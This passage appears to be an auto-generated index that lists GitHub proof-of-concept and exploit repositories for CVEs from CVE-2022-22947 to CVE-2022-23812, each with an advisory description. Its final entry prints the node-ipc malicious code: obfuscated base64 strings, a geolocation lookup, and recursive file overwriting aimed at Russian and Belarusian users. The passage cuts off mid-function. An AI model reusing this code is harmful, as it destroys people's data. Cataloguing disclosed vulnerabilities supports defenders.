- [4nNns/CVE-2022-22947](https://github.com/4nNns/CVE-2022-22947)
- [expzhizhuo/Burp_VulPscan](https://github.com/expzhizhuo/Burp_VulPscan)
- [twseptian/cve-2022-22947](https://github.com/twseptian/cve-2022-22947)
- [whwlsfb/cve-2022-22947-godzilla-memshell](https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell)
- [0730Nophone/CVE-2022-22947-](https://github.com/0730Nophone/CVE-2022-22947-)
- [anansec/CVE-2022-22947_EXP](https://github.com/anansec/CVE-2022-22947_EXP)
- [Wrong-pixel/CVE-2022-22947-exp](https://github.com/Wrong-pixel/CVE-2022-22947-exp)
- [stayfoolish777/CVE-2022-22947-POC](https://github.com/stayfoolish777/CVE-2022-22947-POC)
- [B0rn2d/Spring-Cloud-Gateway-Nacos](https://github.com/B0rn2d/Spring-Cloud-Gateway-Nacos)
- [kmahyyg/CVE-2022-22947](https://github.com/kmahyyg/CVE-2022-22947)
- [LY613313/CVE-2022-22947](https://github.com/LY613313/CVE-2022-22947)
- [SiJiDo/CVE-2022-22947](https://github.com/SiJiDo/CVE-2022-22947)
- [qq87234770/CVE-2022-22947](https://github.com/qq87234770/CVE-2022-22947)
- [Zh0um1/CVE-2022-22947](https://github.com/Zh0um1/CVE-2022-22947)
- [Le1a/CVE-2022-22947](https://github.com/Le1a/CVE-2022-22947)
- [cc3305/CVE-2022-22947](https://github.com/cc3305/CVE-2022-22947)
### CVE-2022-22948 (2022-03-29)
The vCenter Server contains an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.
- [PenteraIO/CVE-2022-22948](https://github.com/PenteraIO/CVE-2022-22948)
### CVE-2022-22954 (2022-04-11)
VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.
- [axingde/CVE-2022-22954-POC](https://github.com/axingde/CVE-2022-22954-POC)
- [sherlocksecurity/VMware-CVE-2022-22954](https://github.com/sherlocksecurity/VMware-CVE-2022-22954)
- [Vulnmachines/VMWare_CVE-2022-22954](https://github.com/Vulnmachines/VMWare_CVE-2022-22954)
- [aniqfakhrul/CVE-2022-22954](https://github.com/aniqfakhrul/CVE-2022-22954)
- [jax7sec/CVE-2022-22954](https://github.com/jax7sec/CVE-2022-22954)
- [bb33bb/CVE-2022-22954-VMware-RCE](https://github.com/bb33bb/CVE-2022-22954-VMware-RCE)
- [lucksec/VMware-CVE-2022-22954](https://github.com/lucksec/VMware-CVE-2022-22954)
- [mumu2020629/-CVE-2022-22954-scanner](https://github.com/mumu2020629/-CVE-2022-22954-scanner)
- [MSeymenD/CVE-2022-22954-Testi](https://github.com/MSeymenD/CVE-2022-22954-Testi)
- [corelight/cve-2022-22954](https://github.com/corelight/cve-2022-22954)
- [DrorDvash/CVE-2022-22954_VMware_PoC](https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC)
- [Jun-5heng/CVE-2022-22954](https://github.com/Jun-5heng/CVE-2022-22954)
- [tunelko/CVE-2022-22954-PoC](https://github.com/tunelko/CVE-2022-22954-PoC)
- [bewhale/CVE-2022-22954](https://github.com/bewhale/CVE-2022-22954)
- [emilyastranova/VMware-CVE-2022-22954-Command-Injector](https://github.com/emilyastranova/VMware-CVE-2022-22954-Command-Injector)
- [MLX15/CVE-2022-22954](https://github.com/MLX15/CVE-2022-22954)
- [mhurts/CVE-2022-22954-POC](https://github.com/mhurts/CVE-2022-22954-POC)
- [nguyenv1nK/CVE-2022-22954](https://github.com/nguyenv1nK/CVE-2022-22954)
- [Chocapikk/CVE-2022-22954](https://github.com/Chocapikk/CVE-2022-22954)
- [secfb/CVE-2022-22954](https://github.com/secfb/CVE-2022-22954)
- [orwagodfather/CVE-2022-22954](https://github.com/orwagodfather/CVE-2022-22954)
- [b4dboy17/CVE-2022-22954](https://github.com/b4dboy17/CVE-2022-22954)
- [arzuozkan/CVE-2022-22954](https://github.com/arzuozkan/CVE-2022-22954)
- [amit-pathak009/CVE-2022-22954](https://github.com/amit-pathak009/CVE-2022-22954)
- [amit-pathak009/CVE-2022-22954-PoC](https://github.com/amit-pathak009/CVE-2022-22954-PoC)
- [Schira4396/VcenterKiller](https://github.com/Schira4396/VcenterKiller)
- [lolminerxmrig/CVE-2022-22954_](https://github.com/lolminerxmrig/CVE-2022-22954_)
### CVE-2022-22963 (2022-04-01)
In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
- [hktalent/spring-spel-0day-poc](https://github.com/hktalent/spring-spel-0day-poc)
- [dinosn/CVE-2022-22963](https://github.com/dinosn/CVE-2022-22963)
- [RanDengShiFu/CVE-2022-22963](https://github.com/RanDengShiFu/CVE-2022-22963)
- [darryk10/CVE-2022-22963](https://github.com/darryk10/CVE-2022-22963)
- [Kirill89/CVE-2022-22963-PoC](https://github.com/Kirill89/CVE-2022-22963-PoC)
- [stevemats/Spring0DayCoreExploit](https://github.com/stevemats/Spring0DayCoreExploit)
- [puckiestyle/CVE-2022-22963](https://github.com/puckiestyle/CVE-2022-22963)
- [me2nuk/CVE-2022-22963](https://github.com/me2nuk/CVE-2022-22963)
- [kh4sh3i/Spring-CVE](https://github.com/kh4sh3i/Spring-CVE)
- [AayushmanThapaMagar/CVE-2022-22963](https://github.com/AayushmanThapaMagar/CVE-2022-22963)
- [twseptian/cve-2022-22963](https://github.com/twseptian/cve-2022-22963)
- [SealPaPaPa/SpringCloudFunction-Research](https://github.com/SealPaPaPa/SpringCloudFunction-Research)
- [G01d3nW01f/CVE-2022-22963](https://github.com/G01d3nW01f/CVE-2022-22963)
- [k3rwin/spring-cloud-function-rce](https://github.com/k3rwin/spring-cloud-function-rce)
- [75ACOL/CVE-2022-22963](https://github.com/75ACOL/CVE-2022-22963)
- [dr6817/CVE-2022-22963](https://github.com/dr6817/CVE-2022-22963)
- [iliass-dahman/CVE-2022-22963-POC](https://github.com/iliass-dahman/CVE-2022-22963-POC)
- [charis3306/CVE-2022-22963](https://github.com/charis3306/CVE-2022-22963)
- [lemmyz4n3771/CVE-2022-22963-PoC](https://github.com/lemmyz4n3771/CVE-2022-22963-PoC)
- [J0ey17/CVE-2022-22963_Reverse-Shell-Exploit](https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit)
- [Mustafa1986/CVE-2022-22963](https://github.com/Mustafa1986/CVE-2022-22963)
- [SourM1lk/CVE-2022-22963-Exploit](https://github.com/SourM1lk/CVE-2022-22963-Exploit)
- [randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE](https://github.com/randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE)
- [gunzf0x/CVE-2022-22963](https://github.com/gunzf0x/CVE-2022-22963)
- [nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963](https://github.com/nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963)
- [BearClaw96/CVE-2022-22963-Poc-Bearcules](https://github.com/BearClaw96/CVE-2022-22963-Poc-Bearcules)
- [jrbH4CK/CVE-2022-22963](https://github.com/jrbH4CK/CVE-2022-22963)
### CVE-2022-22965 (2022-04-01)
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
- [BobTheShoplifter/Spring4Shell-POC](https://github.com/BobTheShoplifter/Spring4Shell-POC)
- [Mr-xn/spring-core-rce](https://github.com/Mr-xn/spring-core-rce)
- [TheGejr/SpringShell](https://github.com/TheGejr/SpringShell)
- [reznok/Spring4Shell-POC](https://github.com/reznok/Spring4Shell-POC)
- [light-Life/CVE-2022-22965-GUItools](https://github.com/light-Life/CVE-2022-22965-GUItools)
- [DDuarte/springshell-rce-poc](https://github.com/DDuarte/springshell-rce-poc)
- [k3rwin/spring-core-rce](https://github.com/k3rwin/spring-core-rce)
- [liangyueliangyue/spring-core-rce](https://github.com/liangyueliangyue/spring-core-rce)
- [Kirill89/CVE-2022-22965-PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)
- [FourCoreLabs/spring4shell-exploit-poc](https://github.com/FourCoreLabs/spring4shell-exploit-poc)
- [alt3kx/CVE-2022-22965_PoC](https://github.com/alt3kx/CVE-2022-22965_PoC)
- [GuayoyoCyber/CVE-2022-22965](https://github.com/GuayoyoCyber/CVE-2022-22965)
- [colincowie/Safer_PoC_CVE-2022-22965](https://github.com/colincowie/Safer_PoC_CVE-2022-22965)
- [rwincey/spring4shell-CVE-2022-22965](https://github.com/rwincey/spring4shell-CVE-2022-22965)
- [viniciuspereiras/CVE-2022-22965-poc](https://github.com/viniciuspereiras/CVE-2022-22965-poc)
- [mebibite/springhound](https://github.com/mebibite/springhound)
- [likewhite/CVE-2022-22965](https://github.com/likewhite/CVE-2022-22965)
- [Axx8/SpringFramework_CVE-2022-22965_RCE](https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE)
- [snicoll-scratches/spring-boot-cve-2022-22965](https://github.com/snicoll-scratches/spring-boot-cve-2022-22965)
- [nu0l/CVE-2022-22965](https://github.com/nu0l/CVE-2022-22965)
- [tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce](https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce)
- [helsecert/CVE-2022-22965](https://github.com/helsecert/CVE-2022-22965)
- [lcarea/CVE-2022-22965](https://github.com/lcarea/CVE-2022-22965)
- [Joe1sn/CVE-2022-22965](https://github.com/Joe1sn/CVE-2022-22965)
- [zer0yu/CVE-2022-22965](https://github.com/zer0yu/CVE-2022-22965)
- [me2nuk/CVE-2022-22965](https://github.com/me2nuk/CVE-2022-22965)
- [wshon/spring-framework-rce](https://github.com/wshon/spring-framework-rce)
- [Wrin9/CVE-2022-22965](https://github.com/Wrin9/CVE-2022-22965)
- [wjl110/CVE-2022-22965_Spring_Core_RCE](https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE)
- [mwojterski/cve-2022-22965](https://github.com/mwojterski/cve-2022-22965)
- [gpiechnik2/nmap-spring4shell](https://github.com/gpiechnik2/nmap-spring4shell)
- [itsecurityco/CVE-2022-22965](https://github.com/itsecurityco/CVE-2022-22965)
- [daniel0x00/Invoke-CVE-2022-22965-SafeCheck](https://github.com/daniel0x00/Invoke-CVE-2022-22965-SafeCheck)
- [fracturelabs/spring4shell_victim](https://github.com/fracturelabs/spring4shell_victim)
- [sunnyvale-it/CVE-2022-22965-PoC](https://github.com/sunnyvale-it/CVE-2022-22965-PoC)
- [twseptian/cve-2022-22965](https://github.com/twseptian/cve-2022-22965)
- [netcode/Spring4shell-CVE-2022-22965-POC](https://github.com/netcode/Spring4shell-CVE-2022-22965-POC)
- [fracturelabs/go-scan-spring](https://github.com/fracturelabs/go-scan-spring)
- [Snip3R69/spring-shell-vuln](https://github.com/Snip3R69/spring-shell-vuln)
- [luoqianlin/CVE-2022-22965](https://github.com/luoqianlin/CVE-2022-22965)
- [0xrobiul/CVE-2022-22965](https://github.com/0xrobiul/CVE-2022-22965)
- [LudovicPatho/CVE-2022-22965_Spring4Shell](https://github.com/LudovicPatho/CVE-2022-22965_Spring4Shell)
- [irgoncalves/irule-cve-2022-22965](https://github.com/irgoncalves/irule-cve-2022-22965)
- [datawiza-inc/spring-rec-demo](https://github.com/datawiza-inc/spring-rec-demo)
- [alt3kx/CVE-2022-22965](https://github.com/alt3kx/CVE-2022-22965)
- [wikiZ/springboot_CVE-2022-22965](https://github.com/wikiZ/springboot_CVE-2022-22965)
- [4nth0ny1130/spring4shell_behinder](https://github.com/4nth0ny1130/spring4shell_behinder)
- [t3amj3ff/Spring4ShellPoC](https://github.com/t3amj3ff/Spring4ShellPoC)
- [CalumHutton/CVE-2022-22965-PoC_Payara](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)
- [fransvanbuul/CVE-2022-22965-susceptibility](https://github.com/fransvanbuul/CVE-2022-22965-susceptibility)
- [te5t321/Spring4Shell-CVE-2022-22965.py](https://github.com/te5t321/Spring4Shell-CVE-2022-22965.py)
- [Loneyers/Spring4Shell](https://github.com/Loneyers/Spring4Shell)
- [p1ckzi/CVE-2022-22965](https://github.com/p1ckzi/CVE-2022-22965)
- [Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965-](https://github.com/Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965-)
- [c4mx/CVE-2022-22965_PoC](https://github.com/c4mx/CVE-2022-22965_PoC)
- [mariomamo/CVE-2022-22965](https://github.com/mariomamo/CVE-2022-22965)
- [khidottrivi/CVE-2022-22965](https://github.com/khidottrivi/CVE-2022-22965)
- [Enokiy/spring-RCE-CVE-2022-22965](https://github.com/Enokiy/spring-RCE-CVE-2022-22965)
- [cxzero/CVE-2022-22965-spring4shell](https://github.com/cxzero/CVE-2022-22965-spring4shell)
- [tpt11fb/SpringVulScan](https://github.com/tpt11fb/SpringVulScan)
- [D1mang/Spring4Shell-CVE-2022-22965](https://github.com/D1mang/Spring4Shell-CVE-2022-22965)
- [iloveflag/Fast-CVE-2022-22965](https://github.com/iloveflag/Fast-CVE-2022-22965)
- [ClemExp/CVE-2022-22965-PoC](https://github.com/ClemExp/CVE-2022-22965-PoC)
- [clemoregan/SSE4-CVE-2022-22965](https://github.com/clemoregan/SSE4-CVE-2022-22965)
- [devengpk/CVE-2022-22965](https://github.com/devengpk/CVE-2022-22965)
- [zangcc/CVE-2022-22965-rexbb](https://github.com/zangcc/CVE-2022-22965-rexbb)
- [ajith737/Spring4Shell-CVE-2022-22965-POC](https://github.com/ajith737/Spring4Shell-CVE-2022-22965-POC)
- [c33dd/CVE-2022-22965](https://github.com/c33dd/CVE-2022-22965)
- [gokul-ramesh/Spring4Shell-PoC-exploit](https://github.com/gokul-ramesh/Spring4Shell-PoC-exploit)
- [bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-](https://github.com/bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-)
- [BKLockly/CVE-2022-22965](https://github.com/BKLockly/CVE-2022-22965)
- [dbgee/Spring4Shell](https://github.com/dbgee/Spring4Shell)
- [jakabakos/CVE-2022-22965-Spring4Shell](https://github.com/jakabakos/CVE-2022-22965-Spring4Shell)
- [sohamsharma966/Spring4Shell-CVE-2022-22965](https://github.com/sohamsharma966/Spring4Shell-CVE-2022-22965)
- [LucasPDiniz/CVE-2022-22965](https://github.com/LucasPDiniz/CVE-2022-22965)
- [xsxtw/SpringFramework_CVE-2022-22965_RCE](https://github.com/xsxtw/SpringFramework_CVE-2022-22965_RCE)
### CVE-2022-22966 (2022-04-14)
An authenticated, high privileged malicious actor with network access to the VMware Cloud Director tenant or provider may be able to exploit a remote code execution vulnerability to gain access to the server.
- [bb33bb/CVE-2022-22966](https://github.com/bb33bb/CVE-2022-22966)
### CVE-2022-22968 (2022-04-14)
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path.
- [MarcinGadz/spring-rce-poc](https://github.com/MarcinGadz/spring-rce-poc)
### CVE-2022-22971 (2022-05-12)
In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, application with a STOMP over WebSocket endpoint is vulnerable to a denial of service attack by an authenticated user.
- [tchize/CVE-2022-22971](https://github.com/tchize/CVE-2022-22971)
### CVE-2022-22972 (2022-05-20)
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
- [horizon3ai/CVE-2022-22972](https://github.com/horizon3ai/CVE-2022-22972)
- [Dghpi9/CVE-2022-22972](https://github.com/Dghpi9/CVE-2022-22972)
- [bengisugun/CVE-2022-22972-](https://github.com/bengisugun/CVE-2022-22972-)
### CVE-2022-22976 (2022-05-19)
Spring Security versions 5.5.x prior to 5.5.7, 5.6.x prior to 5.6.4, and earlier unsupported versions contain an integer overflow vulnerability. When using the BCrypt class with the maximum work factor (31), the encoder does not perform any salt rounds, due to an integer overflow error. The default settings are not affected by this CVE.
- [spring-io/cve-2022-22976-bcrypt-skips-salt](https://github.com/spring-io/cve-2022-22976-bcrypt-skips-salt)
### CVE-2022-22978 (2022-05-19)
In spring security versions prior to 5.4.11+, 5.5.7+ , 5.6.4+ and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.
- [DeEpinGh0st/CVE-2022-22978](https://github.com/DeEpinGh0st/CVE-2022-22978)
- [ducluongtran9121/CVE-2022-22978-PoC](https://github.com/ducluongtran9121/CVE-2022-22978-PoC)
- [aeifkz/CVE-2022-22978](https://github.com/aeifkz/CVE-2022-22978)
- [umakant76705/CVE-2022-22978](https://github.com/umakant76705/CVE-2022-22978)
- [Raghvendra1207/CVE-2022-22978](https://github.com/Raghvendra1207/CVE-2022-22978)
- [wan9xx/CVE-2022-22978-demo](https://github.com/wan9xx/CVE-2022-22978-demo)
- [BoB13-Opensource-Contribution-Team9/CVE-2022-22978](https://github.com/BoB13-Opensource-Contribution-Team9/CVE-2022-22978)
### CVE-2022-22980 (2022-06-22)
A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized.
- [trganda/CVE-2022-22980](https://github.com/trganda/CVE-2022-22980)
- [kuron3k0/Spring-Data-Mongodb-Example](https://github.com/kuron3k0/Spring-Data-Mongodb-Example)
- [li8u99/Spring-Data-Mongodb-Demo](https://github.com/li8u99/Spring-Data-Mongodb-Demo)
- [jweny/cve-2022-22980](https://github.com/jweny/cve-2022-22980)
- [murataydemir/CVE-2022-22980](https://github.com/murataydemir/CVE-2022-22980)
- [Vulnmachines/Spring_cve-2022-22980](https://github.com/Vulnmachines/Spring_cve-2022-22980)
### CVE-2022-23046 (2022-01-19)
PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL sentences in the "subnet" parameter while searching a subnet via app/admin/routing/edit-bgp-mapping-search.php
- [jcarabantes/CVE-2022-23046](https://github.com/jcarabantes/CVE-2022-23046)
- [dnr6419/CVE-2022-23046](https://github.com/dnr6419/CVE-2022-23046)
- [hadrian3689/phpipam_1.4.4](https://github.com/hadrian3689/phpipam_1.4.4)
- [bernauers/CVE-2022-23046](https://github.com/bernauers/CVE-2022-23046)
### CVE-2022-23093 (2024-02-15)
ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a "quoted packet," which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header.\n\nThe pr_pack() copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes.\n\nThe memory safety bugs described above can be triggered by a remote host, causing the ping program to crash.\n\nThe ping process runs in a capability mode sandbox on all affected versions of FreeBSD and is thus very constrained in how it can interact with the rest of the system at the point where the bug can occur.
- [Inplex-sys/CVE-2022-23093](https://github.com/Inplex-sys/CVE-2022-23093)
- [Symbolexe/DrayTek-Exploit](https://github.com/Symbolexe/DrayTek-Exploit)
### CVE-2022-23131 (2022-01-13)
In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Malicious unauthenticated actor may exploit this issue to escalate privileges and gain admin access to Zabbix Frontend. To perform the attack, SAML authentication is required to be enabled and the actor has to know the username of Zabbix user (or use the guest account, which is disabled by default).
- [qq1549176285/CVE-2022-23131](https://github.com/qq1549176285/CVE-2022-23131)
- [jweny/CVE-2022-23131](https://github.com/jweny/CVE-2022-23131)
- [Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131)
- [1mxml/CVE-2022-23131](https://github.com/1mxml/CVE-2022-23131)
- [zwjjustdoit/cve-2022-23131](https://github.com/zwjjustdoit/cve-2022-23131)
- [L0ading-x/cve-2022-23131](https://github.com/L0ading-x/cve-2022-23131)
- [random-robbie/cve-2022-23131-exp](https://github.com/random-robbie/cve-2022-23131-exp)
- [trganda/CVE-2022-23131](https://github.com/trganda/CVE-2022-23131)
- [pykiller/CVE-2022-23131](https://github.com/pykiller/CVE-2022-23131)
- [Fa1c0n35/zabbix-cve-2022-23131](https://github.com/Fa1c0n35/zabbix-cve-2022-23131)
- [kh4sh3i/CVE-2022-23131](https://github.com/kh4sh3i/CVE-2022-23131)
- [Kazaf6s/CVE-2022-23131](https://github.com/Kazaf6s/CVE-2022-23131)
- [SCAMagic/CVE-2022-23131poc-exp-zabbix-](https://github.com/SCAMagic/CVE-2022-23131poc-exp-zabbix-)
- [Vulnmachines/Zabbix-CVE-2022-23131](https://github.com/Vulnmachines/Zabbix-CVE-2022-23131)
- [wr0x00/cve-2022-23131](https://github.com/wr0x00/cve-2022-23131)
- [Arrnitage/CVE-2022-23131_exp](https://github.com/Arrnitage/CVE-2022-23131_exp)
- [clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131](https://github.com/clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131)
- [r10lab/CVE-2022-23131](https://github.com/r10lab/CVE-2022-23131)
- [fork-bombed/CVE-2022-23131](https://github.com/fork-bombed/CVE-2022-23131)
- [davidzzo23/CVE-2022-23131](https://github.com/davidzzo23/CVE-2022-23131)
### CVE-2022-23222 (2022-01-14)
kernel/bpf/verifier.c in the Linux kernel through 5.15.14 allows local users to gain privileges because of the availability of pointer arithmetic via certain *_OR_NULL pointer types.
- [tr3ee/CVE-2022-23222](https://github.com/tr3ee/CVE-2022-23222)
- [PenteraIO/CVE-2022-23222-POC](https://github.com/PenteraIO/CVE-2022-23222-POC)
- [FridayOrtiz/CVE-2022-23222](https://github.com/FridayOrtiz/CVE-2022-23222)
- [LeoMarche/ProjetSecu](https://github.com/LeoMarche/ProjetSecu)
### CVE-2022-23253 (2022-03-09)
Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability
- [nettitude/CVE-2022-23253-PoC](https://github.com/nettitude/CVE-2022-23253-PoC)
### CVE-2022-23270 (2022-05-10)
Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
- [corelight/CVE-2022-23270-PPTP](https://github.com/corelight/CVE-2022-23270-PPTP)
### CVE-2022-23277 (2022-03-09)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [7BitsTeam/CVE-2022-23277](https://github.com/7BitsTeam/CVE-2022-23277)
### CVE-2022-23303 (2022-01-17)
The implementations of SAE in hostapd before 2.10 and wpa_supplicant before 2.10 are vulnerable to side channel attacks as a result of cache access patterns. NOTE: this issue exists because of an incomplete fix for CVE-2019-9494.
- [skulkarni-mv/hostapd_mirror](https://github.com/skulkarni-mv/hostapd_mirror)
### CVE-2022-23305 (2022-01-18)
By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)
- [AlphabugX/CVE-2022-RCE](https://github.com/AlphabugX/CVE-2022-RCE)
- [tkomlodi/CVE-2022-23305_POC](https://github.com/tkomlodi/CVE-2022-23305_POC)
### CVE-2022-23342 (2022-06-21)
The Hyland Onbase Application Server releases prior to 20.3.58.1000 and OnBase releases 21.1.1.1000 through 21.1.15.1000 are vulnerable to a username enumeration vulnerability. An attacker can obtain valid users based on the response returned for invalid and valid users by sending a POST login request to the /mobilebroker/ServiceToBroker.svc/Json/Connect endpoint. This can lead to user enumeration against the underlying Active Directory integrated systems.
- [InitRoot/CVE-2022-23342](https://github.com/InitRoot/CVE-2022-23342)
### CVE-2022-23361
- [ViNi0608/CVE-2022-23361](https://github.com/ViNi0608/CVE-2022-23361)
### CVE-2022-23378 (2022-02-09)
A Cross-Site Scripting (XSS) vulnerability exists within the 3.2.2 version of TastyIgniter. The "items%5B0%5D%5Bpath%5D" parameter of a request made to /admin/allergens/edit/1 is vulnerable.
- [TheGetch/CVE-2022-23378](https://github.com/TheGetch/CVE-2022-23378)
### CVE-2022-23529
- [despossivel/CVE-2022-23529-lab](https://github.com/despossivel/CVE-2022-23529-lab)
- [hackintoanetwork/CVE-2022-23529-PoC](https://github.com/hackintoanetwork/CVE-2022-23529-PoC)
### CVE-2022-23614 (2022-02-04)
Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrade.
- [davwwwx/CVE-2022-23614](https://github.com/davwwwx/CVE-2022-23614)
- [4rtamis/CVE-2022-23614](https://github.com/4rtamis/CVE-2022-23614)
### CVE-2022-23642 (2022-02-18)
Sourcegraph is a code search and navigation engine. Sourcegraph prior to version 3.37 is vulnerable to remote code execution in the `gitserver` service. The service acts as a git exec proxy, and fails to properly restrict calling `git config`. This allows an attacker to set the git `core.sshCommand` option, which sets git to use the specified command instead of ssh when they need to connect to a remote system. Exploitation of this vulnerability depends on how Sourcegraph is deployed. An attacker able to make HTTP requests to internal services like gitserver is able to exploit it. This issue is patched in Sourcegraph version 3.37. As a workaround, ensure that requests to gitserver are properly protected.
- [Altelus1/CVE-2022-23642](https://github.com/Altelus1/CVE-2022-23642)
### CVE-2022-23648 (2022-03-03)
containerd is a container runtime available as a daemon for Linux and Windows. A bug was found in containerd prior to versions 1.6.1, 1.5.10, and 1.14.12 where containers launched through containerd’s CRI implementation on Linux with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host. This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information. Kubernetes and crictl can both be configured to use containerd’s CRI implementation. This bug has been fixed in containerd 1.6.1, 1.5.10, and 1.4.12. Users should update to these versions to resolve the issue.
- [raesene/CVE-2022-23648-POC](https://github.com/raesene/CVE-2022-23648-POC)
### CVE-2022-23731 (2022-03-11)
V8 javascript engine (heap vulnerability) can cause privilege escalation ,which can impact on some webOS TV models.
- [DavidBuchanan314/WAMpage](https://github.com/DavidBuchanan314/WAMpage)
### CVE-2022-23773 (2022-02-11)
cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags.
- [danbudris/CVE-2022-23773-repro](https://github.com/danbudris/CVE-2022-23773-repro)
- [danbudris/CVE-2022-23773-repro-target](https://github.com/danbudris/CVE-2022-23773-repro-target)
- [YouShengLiu/CVE-2022-23773-Reproduce](https://github.com/YouShengLiu/CVE-2022-23773-Reproduce)
### CVE-2022-23779 (2022-03-02)
Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.
- [fbusr/CVE-2022-23779](https://github.com/fbusr/CVE-2022-23779)
- [Vulnmachines/Zoho_CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)
### CVE-2022-23808 (2022-01-22)
An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.
- [dipakpanchal05/CVE-2022-23808](https://github.com/dipakpanchal05/CVE-2022-23808)
### CVE-2022-23812 (2022-03-16)
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } 